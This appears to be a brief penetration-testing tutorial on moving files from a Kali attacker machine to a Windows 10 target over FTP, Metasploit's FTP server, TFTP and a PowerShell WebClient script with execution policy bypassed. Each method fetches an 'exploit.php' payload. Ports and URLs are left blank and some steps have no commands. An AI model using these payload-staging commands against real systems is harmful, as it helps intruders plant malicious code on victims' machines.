File transfer type:


Transfer files through the website.




python FTP

(1)Install python FTP on the Kali Linux.

pip3 install pyftpdlib

(2)Move to the target folder, and start the FTP service.

python3 -m pyftpdlib -p 

(3)Login the ftp service on Windows 10 anonymously.

(4) Get the file form FTP server.

(5)Exit FTP service.

We can also save the shellcode to txt file.

(1) Execute the following commands to make the ftp command file.

echo open > ftp.txt

echo anonymous>> ftp.txt

echo pass>>ftp.txt

echo binary>> ftp.txt

echo get exploit.php >> ftp.txt

echo bye >> ftp.txt

(2) Get the files from the FTP server.

ftp -s:ftp.txt


(1) Start the metasploit.

(2) Initiate the FTP service,.

use auxiliary/server/ftp

show options


(3) Stop the FTP service.


(1)Start the TFTP service on Kali Linux.

atftpd --daemon --port  /var/www/html

(2) Get the file from tftp server.

tftp -i get exploit.php


(1) Make the powershell file to get the file form Kali server.

echo $storage = $pwd > get.ps1

echo $webclient = New-Object System.Net.Webclient >> get.ps1

echo $url = "" >> get.ps1

echo $file = "exploit.php" >> get.ps1

echo $webclient.DownloadFile($url,$file) >> get.ps1

(2)Execute the powershell code.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1

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